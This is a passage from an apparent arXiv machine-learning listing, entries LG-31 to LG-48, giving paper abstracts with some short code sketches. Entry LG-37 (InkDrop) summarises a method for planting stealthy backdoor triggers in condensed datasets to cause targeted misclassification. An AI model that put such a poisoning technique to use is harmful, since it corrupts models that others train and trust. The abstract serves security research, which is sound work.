Abstract:Static regret to a single expert is often the wrong target for strictly online prediction under non-stationarity, where the best expert may switch repeatedly over time. We study Policy-Controlled Generalized Share (PCGS), a general strictly online framework in which the generalized-share recursion is fixed while the post-loss update controls are allowed to vary adaptively. Its principal instantiation in this paper is PCGS-TF, which uses a causal Transformer as an update controller: after round t finishes and the loss vector is observed, the Transformer outputs the controls that map w_t to w_{t+1} without altering the already committed decision w_t. Under admissible post-loss update controls, we obtain a pathwise weighted regret guarantee for general time-varying learning rates, and a standard dynamic-regret guarantee against any expert path with at most S switches under the constant-learning-rate specialization. Empirically, on a controlled synthetic suite with exact dynamic-programming switching-oracle evaluation, PCGS-TF attains the lowest mean dynamic regret in all seven non-stationary families, with its advantage increasing for larger expert pools. On a reproduced household-electricity benchmark, PCGS-TF also achieves the lowest normalized dynamic regret for S = 5, 10, and 20.
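With constant controls, a generalized-share recursion reduces to the classic fixed-share update; the one-round sketch below is illustrative (the uniform-mixing form is an assumption, and in PCGS-TF the controls eta and alpha would be emitted per round by the Transformer controller after the loss is observed):

```python
import numpy as np

def generalized_share_step(w, loss, eta, alpha):
    """One post-loss share-style update: an exponential-weights step
    followed by mixing a fraction alpha of mass uniformly across experts,
    which is what lets the learner track a switching oracle rather than
    a single fixed expert."""
    v = w * np.exp(-eta * loss)           # multiplicative-weights step
    v /= v.sum()
    n = len(w)
    return (1.0 - alpha) * v + alpha / n  # share step: uniform mixing
```

The uniform mixing floor `alpha / n` guarantees every expert retains some weight, so the learner can recover quickly when the best expert switches.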
[LG-31] Automating Early Disease Prediction Via Structured and Unstructured Clinical Data
链接: https://arxiv.org/abs/2603.28167
作者: Ane G Domingo-Aldama,Marcos Merino Prado,Alain García Olea,Josu Goikoetxea,Koldo Gojenola,Aitziber Atutxa
类目: Machine Learning (cs.LG)
*备注:
Abstract:This study presents a fully automated methodology for early prediction studies in clinical settings, leveraging information extracted from unstructured discharge reports. The proposed pipeline uses discharge reports to support the three main steps of early prediction: cohort selection, dataset generation, and outcome labeling. By processing discharge reports with natural language processing techniques, we can efficiently identify relevant patient cohorts, enrich structured datasets with additional clinical variables, and generate high-quality labels without manual intervention. This approach addresses the frequent issue of missing or incomplete data in codified electronic health records (EHR), capturing clinically relevant information that is often underrepresented. We evaluate the methodology in the context of predicting atrial fibrillation (AF) progression, showing that predictive models trained on datasets enriched with discharge report information achieve higher accuracy and correlation with true outcomes compared to models trained solely on structured EHR data, while also surpassing traditional clinical scores. These results demonstrate that automating the integration of unstructured clinical text can streamline early prediction studies, improve data quality, and enhance the reliability of predictive models for clinical decision-making.
[LG-32] ORACAL: A Robust and Explainable Multimodal Framework for Smart Contract Vulnerability Detection with Causal Graph Enrichment
链接: https://arxiv.org/abs/2603.28128
作者: Tran Duong Minh Dai,Triet Huynh Minh Le,M. Ali Babar,Van-Hau Pham,Phan The Duy
类目: Machine Learning (cs.LG); Cryptography and Security (cs.CR)
*备注: 26 pages
Abstract:Although Graph Neural Networks (GNNs) have shown promise for smart contract vulnerability detection, they still face significant limitations. Homogeneous graph models fail to capture the interplay between control flow and data dependencies, while heterogeneous graph approaches often lack deep semantic understanding, leaving them susceptible to adversarial attacks. Moreover, most black-box models fail to provide explainable evidence, hindering trust in professional audits. To address these challenges, we propose ORACAL (Observable RAG-enhanced Analysis with CausAL reasoning), a heterogeneous multimodal graph learning framework that integrates Control Flow Graph (CFG), Data Flow Graph (DFG), and Call Graph (CG). ORACAL selectively enriches critical subgraphs with expert-level security context from Retrieval-Augmented Generation (RAG) and Large Language Models (LLMs), and employs a causal attention mechanism to disentangle true vulnerability indicators from spurious correlations. For transparency, the framework adopts PGExplainer to generate subgraph-level explanations identifying vulnerability triggering paths. Experiments on large-scale datasets demonstrate that ORACAL achieves state-of-the-art performance, outperforming MANDO-HGT, MTVHunter, GNN-SC, and SCVHunter by up to 39.6 percentage points, with a peak Macro F1 of 91.28% on the primary benchmark. ORACAL maintains strong generalization on out-of-distribution datasets with 91.8% on CGT Weakness and 77.1% on DAppScan. In explainability evaluation, PGExplainer achieves 32.51% Mean Intersection over Union (MIoU) against manually annotated vulnerability triggering paths. Under adversarial attacks, ORACAL limits performance degradation to approximately 2.35% F1 decrease with an Attack Success Rate (ASR) of only 3%, surpassing SCVHunter and MANDO-HGT which exhibit ASRs ranging from 10.91% to 18.73%.
[LG-33] Neural Federated Learning for Livestock Growth Prediction IJCNN2026
链接: https://arxiv.org/abs/2603.28117
作者: Shoujin Wang,Mingze Ni,Wei Liu,Victor W. Chu,Kenny Sabir,Bryan Zheng,Ayush Kanwal,Roy Jing Yang,Fang Chen
类目: Machine Learning (cs.LG)
*备注: Accepted by WCCI 2026 (IJCNN 2026)
Abstract:Livestock growth prediction is essential for optimising farm management and improving the efficiency and sustainability of livestock production, yet it remains underexplored due to limited large-scale datasets and privacy concerns surrounding farm-level data. Existing biophysical models rely on fixed formulations, while most machine learning approaches are trained on small, isolated datasets, limiting their robustness and generalisability. To address these challenges, we propose LivestockFL, the first federated learning framework specifically designed for livestock growth prediction. LivestockFL enables collaborative model training across distributed farms without sharing raw data, thereby preserving data privacy while alleviating data sparsity, particularly for farms with limited historical records. The framework employs a neural architecture based on a Gated Recurrent Unit combined with a multilayer perceptron to model temporal growth patterns from historical weight records and auxiliary features. We further introduce LivestockPFL, a novel personalised federated learning framework that extends the above federated learning framework with a personalized prediction head trained on each farm’s local data, producing farm-specific predictors. Experiments on a real-world dataset demonstrate the effectiveness and practicality of the proposed approaches.
[LG-34] Graph Vector Field: A Unified Framework for Multimodal Health Risk Assessment from Heterogeneous Wearable and Environmental Data Streams
链接: https://arxiv.org/abs/2603.28115
作者: Silvano Coletti,Francesca Fallucchi
类目: Machine Learning (cs.LG)
*备注: 25 pages, 6 appendices. Theoretical framework; no empirical experiments
Abstract:Digital health research has advanced dynamic graph-based disease models, topological learning on simplicial complexes, and multimodal mixture-of-experts architectures, but these strands remain largely disconnected. We propose Graph Vector Field (GVF), a framework that models health risk as a vector-valued field on time-varying simplicial complexes, coupling discrete differential-geometric operators with modality-structured mixture-of-experts. Risk is represented as a vector-valued cochain whose evolution is parameterised with Hodge Laplacians and discrete exterior calculus operators, yielding a Helmholtz-Hodge decomposition into potential-driven (exact), circulation-like (coexact), and topologically constrained (harmonic) components linked to interpretable propagation, cyclic, and persistent risk mechanisms. Multimodal inputs from wearable sensors, behavioural/environmental context, and clinical/genomic data are incorporated through a bundle-structured mixture-of-experts in which modality-specific latent spaces are attached as fibres to the base complex. This separates modality-specific from shared contributions and offers a principled route toward modality-level identifiability. GVF integrates geometric dynamical systems, higher-order topology (enforced indirectly via geometric regularisation and Hodge decomposition), and structured multimodal fusion into a single framework for interpretable, modality-resolved risk modelling. This paper develops the mathematical foundations, architectural design, and formal guarantees; empirical validation is the subject of ongoing work.
[LG-35] Lipschitz verification of neural networks through training
链接: https://arxiv.org/abs/2603.28113
作者: Simon Kuang,Yuezhu Xu,S. Sivaranjani,Xinfan Lin
类目: Machine Learning (cs.LG)
*备注:
Abstract:The global Lipschitz constant of a neural network governs both adversarial robustness and generalization. Conventional approaches to "certified training" typically follow a train-then-verify paradigm: they train a network and then attempt to bound its Lipschitz constant. Because the efficient "trivial bound" (the product of the layerwise Lipschitz constants) is exponentially loose for arbitrary networks, these approaches must rely on computationally expensive techniques such as semidefinite programming, mixed-integer programming, or branch-and-bound. We propose a different paradigm: rather than designing complex verifiers for arbitrary networks, we design networks to be verifiable by the fast trivial bound. We show that directly penalizing the trivial bound during training forces it to become tight, thereby effectively regularizing the true Lipschitz constant. To achieve this, we identify three structural obstructions to a tight trivial bound (dead neurons, bias terms, and ill-conditioned weights) and introduce architectural mitigations, including a novel notion of norm-saturating polyactivations and bias-free sinusoidal layers. Our approach avoids the runtime complexity of advanced verification while achieving strong results: we train robust networks on MNIST with Lipschitz bounds that are small (orders of magnitude lower than comparable works) and tight (within 10% of the ground truth). The experimental results validate the theoretical guarantees, support the proposed mechanisms, and extend empirically to diverse activations and non-Euclidean norms.
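The trivial bound itself is just a product of layerwise operator norms, and penalizing it during training is a one-liner; the sketch below assumes 1-Lipschitz activations, and the penalty weighting and names are illustrative rather than the paper's exact objective:

```python
import numpy as np

def trivial_lipschitz_bound(weights):
    """The 'trivial bound': product of layerwise spectral norms, an upper
    bound on the network's global Lipschitz constant when activations are
    1-Lipschitz. The paper's idea is to penalize this quantity during
    training so that it becomes tight rather than exponentially loose."""
    bound = 1.0
    for w in weights:
        bound *= np.linalg.norm(w, ord=2)  # largest singular value
    return bound

def penalized_loss(task_loss, weights, lam=1e-3):
    """Hypothetical training objective: task loss plus a penalty on the
    trivial bound (lam and the additive form are illustrative)."""
    return task_loss + lam * trivial_lipschitz_bound(weights)
```

Note the bound is exactly 1 for a stack of orthogonal layers, which is why ill-conditioned weights are one of the three obstructions to tightness.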
[LG-36] Heddle: A Distributed Orchestration System for Agentic RL Rollout
链接: https://arxiv.org/abs/2603.28101
作者: Zili Zhang,Yinmin Zhong,Chengxu Yang,Chao Jin,Bingyang Wu,Xinming Wei,Yuliang Liu,Xin Jin
类目: Machine Learning (cs.LG)
*备注:
Abstract:Agentic Reinforcement Learning (RL) enables LLMs to solve complex tasks by alternating between a data-collection rollout phase and a policy training phase. During rollout, the agent generates trajectories, i.e., multi-step interactions between LLMs and external tools. Yet, frequent tool calls induce long-tailed trajectory generation that bottlenecks rollouts. This stems from step-centric designs that ignore trajectory context, triggering three system problems for long-tail trajectory generation: queueing delays, interference overhead, and inflated per-token time. We propose Heddle, a trajectory-centric system to optimize the when, where, and how of agentic rollout execution. Heddle integrates three core mechanisms: trajectory-level scheduling using runtime prediction and progressive priority to minimize cumulative queueing; trajectory-aware placement via presorted dynamic programming and opportunistic migration during idle tool call intervals to minimize interference; and trajectory-adaptive resource manager that dynamically tunes model parallelism to accelerate the per-token time of long-tail trajectories while maintaining high throughput for short trajectories. Evaluations across diverse agentic RL workloads demonstrate that Heddle effectively neutralizes the long-tail bottleneck, achieving up to 2.5 \times higher end-to-end rollout throughput compared to state-of-the-art baselines.
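Trajectory-level scheduling by predicted remaining runtime can be sketched with a priority queue; this is a toy ordering only, omitting Heddle's progressive priority, opportunistic migration, and adaptive parallelism:

```python
import heapq

def schedule_rollouts(trajectories, predict_runtime):
    """Toy trajectory-level scheduler: order pending trajectories by
    predicted remaining runtime so that short trajectories are not queued
    behind long-tail ones. predict_runtime is a user-supplied estimator
    (in Heddle, a learned runtime predictor)."""
    heap = [(predict_runtime(t), i, t) for i, t in enumerate(trajectories)]
    heapq.heapify(heap)
    order = []
    while heap:
        _, _, t = heapq.heappop(heap)
        order.append(t)
    return order
```

Shortest-predicted-first minimizes cumulative queueing delay across trajectories, which is the queueing problem the abstract attributes to step-centric designs.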
[LG-37] InkDrop: Invisible Backdoor Attacks Against Dataset Condensation
链接: https://arxiv.org/abs/2603.28092
作者: He Yang,Dongyi Lv,Song Ma,Wei Xi,Zhi Wang,Hanlin Gu,Yajie Wang
类目: Machine Learning (cs.LG)
*备注:
Abstract:Dataset Condensation (DC) is a data-efficient learning paradigm that synthesizes small yet informative datasets, enabling models to match the performance of full-data training. However, recent work exposes a critical vulnerability of DC to backdoor attacks, where malicious patterns (\textite.g., triggers) are implanted into the condensation dataset, inducing targeted misclassification on specific inputs. Existing attacks always prioritize attack effectiveness and model utility, overlooking the crucial dimension of stealthiness. To bridge this gap, we propose InkDrop, which enhances the imperceptibility of malicious manipulation without degrading attack effectiveness and model utility. InkDrop leverages the inherent uncertainty near model decision boundaries, where minor input perturbations can induce semantic shifts, to construct a stealthy and effective backdoor attack. Specifically, InkDrop first selects candidate samples near the target decision boundary that exhibit latent semantic affinity to the target class. It then learns instance-dependent perturbations constrained by perceptual and spatial consistency, embedding targeted malicious behavior into the condensed dataset. Extensive experiments across diverse datasets validate the overall effectiveness of InkDrop, demonstrating its ability to integrate adversarial intent into condensed datasets while preserving model utility and minimizing detectability. Our code is available at this https URL.
[LG-38] Koopman-based surrogate modeling for reinforcement-learning-control of Rayleigh-Benard convection
链接: https://arxiv.org/abs/2603.28074
作者: Tim Plotzki,Sebastian Peitz
类目: Machine Learning (cs.LG); Dynamical Systems (math.DS)
*备注:
Abstract:Training reinforcement learning (RL) agents to control fluid dynamics systems is computationally expensive due to the high cost of direct numerical simulations (DNS) of the governing equations. Surrogate models offer a promising alternative by approximating the dynamics at a fraction of the computational cost, but their feasibility as training environments for RL is limited by distribution shifts, as policies induce state distributions not covered by the surrogate training data. In this work, we investigate the use of Linear Recurrent Autoencoder Networks (LRANs) for accelerating RL-based control of 2D Rayleigh-Bénard convection. We evaluate two training strategies: a surrogate trained on precomputed data generated with random actions, and a policy-aware surrogate trained iteratively using data collected from an evolving policy. Our results show that while surrogate-only training leads to reduced control performance, combining surrogates with DNS in a pretraining scheme recovers state-of-the-art performance while reducing training time by more than 40%. We demonstrate that policy-aware training mitigates the effects of distribution shift, enabling more accurate predictions in policy-relevant regions of the state space.
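The LRAN structure (encode, advance linearly with a Koopman-style operator, decode) can be sketched with plain matrices standing in for the learned maps; the class and its interface are illustrative:

```python
import numpy as np

class LinearLatentSurrogate:
    """Sketch of the LRAN idea: encode a flow state into a latent vector
    whose dynamics are linear (a Koopman-style operator K), then decode.
    Plain matrices stand in for the learned encoder/decoder networks."""

    def __init__(self, encoder, K, decoder):
        self.encoder, self.K, self.decoder = encoder, K, decoder

    def rollout(self, x0, steps):
        """Advance the latent state linearly and decode each step, giving
        a cheap multi-step prediction to use as an RL training environment."""
        z = self.encoder @ x0
        states = []
        for _ in range(steps):
            z = self.K @ z  # linear advance in latent space
            states.append(self.decoder @ z)
        return np.stack(states)
```

Because the latent dynamics are linear, multi-step rollouts cost one matrix-vector product per step, which is the source of the surrogate's speedup over DNS.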
[LG-39] SIMR-NO: A Spectrally-Informed Multi-Resolution Neural Operator for Turbulent Flow Super-Resolution
链接: https://arxiv.org/abs/2603.28073
作者: Muhammad Abid,Omer San
类目: Machine Learning (cs.LG); Fluid Dynamics (physics.flu-dyn)
*备注:
Abstract:Reconstructing high-resolution turbulent flow fields from severely under-resolved observations is a fundamental inverse problem in computational fluid dynamics and scientific machine learning. Classical interpolation methods fail to recover missing fine-scale structures, while existing deep learning approaches rely on convolutional architectures that lack the spectral and multiscale inductive biases necessary for physically faithful reconstruction at large upscaling factors. We introduce the Spectrally-Informed Multi-Resolution Neural Operator (SIMR-NO), a hierarchical operator learning framework that factorizes the ill-posed inverse mapping across intermediate spatial resolutions, combines deterministic interpolation priors with spectrally gated Fourier residual corrections at each stage, and incorporates local refinement modules to recover fine-scale spatial features beyond the truncated Fourier basis. The proposed method is evaluated on Kolmogorov-forced two-dimensional turbulence, where 128\times128 vorticity fields are reconstructed from extremely coarse 8\times8 observations representing a 16\times downsampling factor. Across 201 independent test realizations, SIMR-NO achieves a mean relative \ell_2 error of 26.04% with the lowest error variance among all methods, reducing reconstruction error by 31.7% over FNO, 26.0% over EDSR, and 9.3% over LapSRN. Beyond pointwise accuracy, SIMR-NO is the only method that faithfully reproduces the ground-truth energy and enstrophy spectra across the full resolved wavenumber range, demonstrating physically consistent super-resolution of turbulent flow fields.
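A spectrally gated residual correction can be sketched with a hard low-wavenumber mask in Fourier space; SIMR-NO learns per-mode gating, so the binary mask, cutoff, and function name below are illustrative:

```python
import numpy as np

def spectral_residual_correction(coarse_upsampled, learned_residual, k_max):
    """Sketch of a spectrally gated residual step: keep the interpolation
    prior unchanged and inject a learned correction only at Fourier modes
    with wavenumber magnitude at most k_max along each axis."""
    f = np.fft.fft2(coarse_upsampled)
    r = np.fft.fft2(learned_residual)
    kx = np.fft.fftfreq(f.shape[0]) * f.shape[0]
    ky = np.fft.fftfreq(f.shape[1]) * f.shape[1]
    mask = (np.abs(kx)[:, None] <= k_max) & (np.abs(ky)[None, :] <= k_max)
    return np.real(np.fft.ifft2(f + mask * r))
```

Spatial refinement modules would then handle content beyond the truncated Fourier basis, which a gate like this deliberately excludes.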
[LG-40] From Vessel Trajectories to Safety-Critical Encounter Scenarios: A Generative AI Framework for Autonomous Ship Digital Testing
链接: https://arxiv.org/abs/2603.28067
作者: Sijin Sun,Liangbin Zhao,Ming Deng,Xiuju Fu
类目: Machine Learning (cs.LG)
*备注: 8 pages, submit for review
Abstract:Digital testing has emerged as a key paradigm for the development and verification of autonomous maritime navigation systems, yet the availability of realistic and diverse safety-critical encounter scenarios remains limited. Existing approaches either rely on handcrafted templates, which lack realism, or extract cases directly from historical data, which cannot systematically expand rare high-risk situations. This paper proposes a data-driven framework that converts large-scale Automatic Identification System (AIS) trajectories into structured safety-critical encounter scenarios. The framework combines generative trajectory modeling with automated encounter pairing and temporal parameterization to enable scalable scenario construction while preserving real traffic characteristics. To enhance trajectory realism and robustness under noisy AIS observations, a multi-scale temporal variational autoencoder is introduced to capture vessel motion dynamics across different temporal resolutions. Experiments on real-world maritime traffic flows demonstrate that the proposed method improves trajectory fidelity and smoothness, maintains statistical consistency with observed data, and enables the generation of diverse safety-critical encounter scenarios beyond those directly recorded. The resulting framework provides a practical pathway for building scenario libraries to support digital testing, benchmarking, and safety assessment of autonomous navigation and intelligent maritime traffic management systems. Code is available at this https URL.
[LG-41] Physics-Embedded Feature Learning for AI in Medical Imaging
链接: https://arxiv.org/abs/2603.28057
作者: Pulock Das,Al Amin,Kamrul Hasan,Rohan Thompson,Azubike D. Okpalaeze,Liang Hong
类目: Machine Learning (cs.LG); Image and Video Processing (eess.IV)
*备注: 7 pages, 5 figures
Abstract:Deep learning (DL) models have achieved strong performance in an intelligence healthcare setting, yet most existing approaches operate as black boxes and ignore the physical processes that govern tumor growth, limiting interpretability, robustness, and clinical trust. To address this limitation, we propose PhysNet, a physics-embedded DL framework that integrates tumor growth dynamics directly into the feature learning process of a convolutional neural network (CNN). Unlike conventional physics-informed methods that impose physical constraints only at the output level, PhysNet embeds a reaction diffusion model of tumor growth within intermediate feature representations of a ResNet backbone. The architecture jointly performs multi-class tumor classification while learning a latent tumor density field, its temporal evolution, and biologically meaningful physical parameters, including tumor diffusion and growth rates, through end-to-end training. This design is necessary because purely data-driven models, even when highly accurate or ensemble-based, cannot guarantee physically consistent predictions or provide insight into tumor behavior. Experimental results on a large brain MRI dataset demonstrate that PhysNet outperforms multiple state-of-the-art DL baselines, including MobileNetV2, VGG16, VGG19, and ensemble models, achieving superior classification accuracy and F1-score. In addition to improved performance, PhysNet produces interpretable latent representations and learned bio-physical parameters that align with established medical knowledge, highlighting physics-embedded representation learning as a practical pathway toward more trustworthy and clinically meaningful medical AI systems.
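The reaction-diffusion dynamics PhysNet embeds can be written as u_t = D∇²u + ρu(1−u), applied here to a 2D feature map. The following is a minimal sketch under our own discretization choices (forward Euler, periodic boundaries, illustrative D, ρ, dt values), not the paper's implementation:

```python
import numpy as np

def reaction_diffusion_step(u, D=0.1, rho=0.05, dt=0.1):
    """One forward-Euler step of u_t = D*Laplacian(u) + rho*u*(1-u)
    on a 2D feature map with periodic boundaries."""
    lap = (np.roll(u, 1, 0) + np.roll(u, -1, 0)
           + np.roll(u, 1, 1) + np.roll(u, -1, 1) - 4 * u)
    return u + dt * (D * lap + rho * u * (1 - u))

u = np.zeros((32, 32))
u[16, 16] = 0.5                      # localized density seed
for _ in range(50):
    u = reaction_diffusion_step(u)   # seed diffuses and grows logistically
```

In PhysNet this update acts on intermediate CNN feature representations, with D and ρ learned end-to-end rather than fixed as above.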
[LG-42] Reducing Oracle Feedback with Vision-Language Embeddings for Preference-Based RL ICRA-2026 ICRA2026
链接: https://arxiv.org/abs/2603.28053
作者: Udita Ghosh,Dripta S. Raychaudhuri,Jiachen Li,Konstantinos Karydis,Amit Roy-Chowdhury
类目: Machine Learning (cs.LG)
*备注: Accepted at ICRA 2026. Project page: this https URL
Abstract:Preference-based reinforcement learning can learn effective reward functions from comparisons, but its scalability is constrained by the high cost of oracle feedback. Lightweight vision-language embedding (VLE) models provide a cheaper alternative, but their noisy outputs limit their effectiveness as standalone reward generators. To address this challenge, we propose ROVED, a hybrid framework that combines VLE-based supervision with targeted oracle feedback. Our method uses the VLE to generate segment-level preferences and defers to an oracle only for samples with high uncertainty, identified through a filtering mechanism. In addition, we introduce a parameter-efficient fine-tuning method that adapts the VLE with the obtained oracle feedback in order to improve the model over time in a synergistic fashion. This ensures the retention of the scalability of embeddings and the accuracy of oracles, while avoiding their inefficiencies. Across multiple robotic manipulation tasks, ROVED matches or surpasses prior preference-based methods while reducing oracle queries by up to 80%. Remarkably, the adapted VLE generalizes across tasks, yielding cumulative annotation savings of up to 90%, highlighting the practicality of combining scalable embeddings with precise oracle supervision for preference-based RL.
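The filtering mechanism above, keeping cheap VLE labels for confident pairs and deferring only uncertain ones to the oracle, can be sketched with a simple margin rule. The margin threshold and function name are our illustrative choices, not ROVED's actual uncertainty estimator:

```python
import numpy as np

def label_preferences(vle_probs, oracle_labels, margin=0.2):
    """Keep VLE preference labels for confident segment pairs; defer
    uncertain ones (|p - 0.5| < margin) to the oracle.
    Returns the final labels and the number of oracle queries."""
    vle_probs = np.asarray(vle_probs)
    uncertain = np.abs(vle_probs - 0.5) < margin
    labels = (vle_probs > 0.5).astype(int)
    labels[uncertain] = oracle_labels[uncertain]
    return labels, int(uncertain.sum())

probs = np.array([0.95, 0.55, 0.10, 0.48])   # VLE preference probabilities
oracle = np.array([1, 0, 0, 1])              # ground-truth preferences
labels, n_queries = label_preferences(probs, oracle)
```

Only the two near-ambiguous pairs trigger oracle queries, which is the source of the query savings reported in the abstract; ROVED additionally fine-tunes the VLE on those answers.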
[LG-43] Diffusion Maps is not Dimensionality Reduction
链接: https://arxiv.org/abs/2603.28037
作者: Julio Candanedo,Alejandro Patiño
类目: Machine Learning (cs.LG)
*备注:
Abstract:Diffusion maps (DMAP) are often used as a dimensionality-reduction tool, but more precisely they provide a spectral representation of the intrinsic geometry rather than a complete charting method. To illustrate this distinction, we study a Swiss roll with known isometric coordinates and compare DMAP, Isomap, and UMAP across latent dimensions. For each representation, we fit an oracle affine readout to the ground-truth chart and measure reconstruction error. Isomap most efficiently recovers the low-dimensional chart, UMAP provides an intermediate tradeoff, and DMAP becomes accurate only after combining multiple diffusion modes. Thus the correct chart lies in the span of diffusion coordinates, but standard DMAP do not by themselves identify the appropriate combination.
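The "oracle affine readout" used for the comparison is simply a least-squares fit of an affine map from the learned coordinates to the ground-truth chart, with the residual measuring how much of the chart lies in the representation's span. A sketch:

```python
import numpy as np

def affine_readout_error(Z, Y):
    """Fit Y ~= Z @ A + b by least squares and return the relative
    reconstruction error of the ground-truth chart Y."""
    Z1 = np.hstack([Z, np.ones((len(Z), 1))])     # append bias column
    coef, *_ = np.linalg.lstsq(Z1, Y, rcond=None)
    resid = Y - Z1 @ coef
    return np.linalg.norm(resid) / np.linalg.norm(Y)

# If the representation spans the chart (here: an invertible affine
# image of it), the readout recovers the chart exactly.
rng = np.random.default_rng(0)
Y = rng.normal(size=(200, 2))                     # ground-truth chart
Z = Y @ np.array([[2.0, 1.0], [0.0, 1.0]]) + 3.0  # affine image of the chart
```

The paper's finding is that for DMAP this error becomes small only once enough diffusion modes are stacked into Z, whereas Isomap needs few coordinates.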
[LG-44] FedDES: Graph-Based Dynamic Ensemble Selection for Personalized Federated Learning
链接: https://arxiv.org/abs/2603.28006
作者: Brianna Mueller,W. Nick Street
类目: Machine Learning (cs.LG)
*备注: 10 pages, 2 figures
Abstract:Statistical heterogeneity in Federated Learning (FL) often leads to negative transfer, where a single global model fails to serve diverse client distributions. Personalized federated learning (pFL) aims to address this by tailoring models to individual clients. However, under most existing pFL approaches, clients integrate peer client contributions uniformly, which ignores the reality that not all peers are likely to be equally beneficial. Additionally, the potential for personalization at the instance level remains largely unexplored, even though the reliability of different peer models often varies across individual samples within the same client. We introduce FedDES (Federated Dynamic Ensemble Selection), a decentralized pFL framework that achieves instance-level personalization through dynamic ensemble selection. Central to our approach is a Graph Neural Network (GNN) meta-learner trained on a heterogeneous graph modeling interactions between data samples and candidate classifiers. For each test query, the GNN dynamically selects and weights peer client models, forming an ensemble of the most competent classifiers while effectively suppressing contributions from those that are irrelevant or potentially harmful for performance. Experiments on CIFAR-10 and real-world ICU healthcare data demonstrate that FedDES outperforms state-of-the-art pFL baselines in non-IID settings, offering robust protection against negative transfer.
[LG-45] From Independent to Correlated Diffusion: Generalized Generative Modeling with Probabilistic Computers
链接: https://arxiv.org/abs/2603.27996
作者: Nihal Sanjay Singh,Mazdak Mohseni-Rajaee,Shaila Niazi,Kerem Y. Camsari
类目: Machine Learning (cs.LG); Emerging Technologies (cs.ET)
*备注:
Abstract:Diffusion models have emerged as a powerful framework for generative tasks in deep learning. They decompose generative modeling into two computational primitives: deterministic neural-network evaluation and stochastic sampling. Current implementations usually place most computation in the neural network, but diffusion as a framework allows a broader range of choices for the stochastic transition kernel. Here, we generalize the stochastic sampling component by replacing independent noise injection with Markov chain Monte Carlo (MCMC) dynamics that incorporate known interaction structure. Standard independent diffusion is recovered as a special case when couplings are set to zero. By explicitly incorporating Ising couplings into the diffusion dynamics, the noising and denoising processes exploit spatial correlations representative of the target system. The resulting framework maps naturally onto probabilistic computers (p-computers) built from probabilistic bits (p-bits), which provide orders-of-magnitude advantages in sampling throughput and energy efficiency over GPUs. We demonstrate the approach on equilibrium states of the 2D ferromagnetic Ising model and the 3D Edwards-Anderson spin glass, showing that correlated diffusion produces samples in closer agreement with MCMC reference distributions than independent diffusion. More broadly, the framework shows that p-computers can enable new classes of diffusion algorithms that exploit structured probabilistic sampling for generative modeling.
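The key generalization, replacing independent noise injection with MCMC dynamics that respect Ising couplings, can be illustrated with a single Glauber sweep on a periodic lattice. The choice of Glauber dynamics and the uniform coupling are our illustrative assumptions; setting J = 0 recovers independent coin-flip noise, i.e. the standard diffusion special case mentioned in the abstract:

```python
import numpy as np

def glauber_sweep(spins, J, beta, rng):
    """One sequential Glauber sweep over +/-1 spins on a periodic 2D
    lattice with uniform nearest-neighbor coupling J. With J = 0 the
    flip probability is 0.5 everywhere: independent noise."""
    n = spins.shape[0]
    for i in range(n):
        for j in range(n):
            h = J * (spins[(i + 1) % n, j] + spins[(i - 1) % n, j]
                     + spins[i, (j + 1) % n] + spins[i, (j - 1) % n])
            p_up = 1.0 / (1.0 + np.exp(-2.0 * beta * h))
            spins[i, j] = 1 if rng.random() < p_up else -1
    return spins

rng = np.random.default_rng(0)
# Strong ferromagnetic coupling at low temperature preserves alignment...
out = glauber_sweep(np.ones((8, 8), dtype=int), J=1.0, beta=5.0, rng=rng)
# ...while J = 0 reduces to independent, structure-free noising.
ind = glauber_sweep(np.ones((8, 8), dtype=int), J=0.0, beta=5.0, rng=rng)
```

On a p-computer each such local stochastic update maps onto a p-bit, which is where the claimed throughput and energy advantages arise.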
[LG-46] Principal Prototype Analysis on Manifold for Interpretable Reinforcement Learning
链接: https://arxiv.org/abs/2603.27971
作者: Bodla Krishna Vamshi,Haizhao Yang
类目: Machine Learning (cs.LG)
*备注:
Abstract:Recent years have witnessed the widespread adoption of reinforcement learning (RL), from solving real-time games to fine-tuning large language models with human preference data, significantly improving alignment with user expectations. However, as model complexity grows exponentially, the interpretability of these systems becomes increasingly challenging. While numerous explainability methods have been developed for computer vision and natural language processing to elucidate both local and global reasoning patterns, their application to RL remains limited. Direct extensions of these methods often struggle to maintain the delicate balance between interpretability and performance within RL settings. Prototype-Wrapper Networks (PW-Nets) have recently shown promise in bridging this gap by enhancing explainability in RL domains without sacrificing the efficiency of the original black-box models. However, these methods typically require manually defined reference prototypes, which often necessitate expert domain knowledge. In this work, we propose a method that removes this dependency by automatically selecting optimal prototypes from the available data. Preliminary experiments on standard Gym environments demonstrate that our approach matches the performance of existing PW-Nets, while remaining competitive with the original black-box models.
[LG-47] Gradient Manipulation in Distributed Stochastic Gradient Descent with Strategic Agents : Truthful Incentives with Convergence Guarantees
链接: https://arxiv.org/abs/2603.27962
作者: Ziqin Chen,Yongqiang Wang
类目: Machine Learning (cs.LG); Computer Science and Game Theory (cs.GT)
*备注: 19 pages, 8 figures
Abstract:Distributed learning has gained significant attention due to its advantages in scalability, privacy, and fault tolerance. In this paradigm, multiple agents collaboratively train a global model by exchanging parameters only with their neighbors. However, a key vulnerability of existing distributed learning approaches is their implicit assumption that all agents behave honestly during gradient updates. In real-world scenarios, this assumption often breaks down, as selfish or strategic agents may be incentivized to manipulate gradients for personal gain, ultimately compromising the final learning outcome. In this work, we propose a fully distributed payment mechanism that, for the first time, guarantees both truthful behaviors and accurate convergence in distributed stochastic gradient descent. This represents a significant advancement, as it overcomes two major limitations of existing truthfulness mechanisms for collaborative learning: (1) reliance on a centralized server for payment collection, and (2) sacrificing convergence accuracy to guarantee truthfulness. In addition to characterizing the convergence rate under general convex and strongly convex conditions, we also prove that our approach guarantees that the cumulative gain an agent can obtain through strategic behavior remains finite, even as the number of iterations approaches infinity, a property unattainable by most existing truthfulness mechanisms. Our experimental results on standard machine learning tasks, evaluated on benchmark datasets, confirm the effectiveness of the proposed approach.
[LG-48] Symbolic Density Estimation: A Decompositional Approach
链接: https://arxiv.org/abs/2603.27955
作者: Angelo Rajendram,Xieting Chu,Vijay Ganesh,Max Fieg,Aishik Ghosh
类目: Machine Learning (cs.LG)
*备注:
